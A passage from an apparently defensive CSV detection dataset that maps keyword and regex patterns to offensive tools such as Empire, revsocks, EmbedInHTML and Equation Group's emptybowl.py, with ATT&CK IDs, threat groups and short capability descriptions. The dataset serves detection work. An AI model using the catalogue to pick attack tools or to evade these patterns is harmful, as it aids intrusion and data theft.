T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","3","247","98","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z" "*ElliotKillick/LdrLockLiberator*",".{0,1000}ElliotKillick\/LdrLockLiberator.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*emailall.py -*",".{0,1000}emailall\.py\s\-.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*emailall.py check*",".{0,1000}emailall\.py\scheck.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*EmailAll-master.*",".{0,1000}EmailAll\-master\..{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*embedInHTML.html*",".{0,1000}embedInHTML\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*embedInHTML.py*",".{0,1000}embedInHTML\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*EmbedInHTML-master*",".{0,1000}EmbedInHTML\-master.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*emilarner/revsocks*",".{0,1000}emilarner\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*empire AttackServers*",".{0,1000}empire\sAttackServers.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Empire Framework GUI*",".{0,1000}Empire\sFramework\sGUI.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*empire --rest *",".{0,1000}empire\s\-\-rest\s.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire --server *",".{0,1000}empire\s\-\-server\s.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*Empire.Agent.Coms.*",".{0,1000}Empire\.Agent\.Coms\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.cs*",".{0,1000}Empire\.Agent\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.Jobs.cs*",".{0,1000}Empire\.Agent\.Jobs\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.Stager.*",".{0,1000}Empire\.Agent\.Stager\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*empire/client/*.py*",".{0,1000}empire\/client\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/*.py*",".{0,1000}empire\/server\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/downloads/*",".{0,1000}empire\/server\/downloads\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire_exec.py*",".{0,1000}empire_exec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*empire_server.*",".{0,1000}empire_server\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empireadmin*",".{0,1000}empireadmin.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire-chain.pem*",".{0,1000}empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*EmpireCORSMiddleware*",".{0,1000}EmpireCORSMiddleware.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Empire-GUI.git*",".{0,1000}Empire\-GUI\.git.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*Empire-master*",".{0,1000}Empire\-master.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire-priv.key*",".{0,1000}empire\-priv\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*EmpireProject*",".{0,1000}EmpireProject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Empire-Sponsors.git*",".{0,1000}Empire\-Sponsors\.git.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire-test-kalirolling*",".{0,1000}empire\-test\-kalirolling.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*emptybowl.py*",".{0,1000}emptybowl\.py.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - 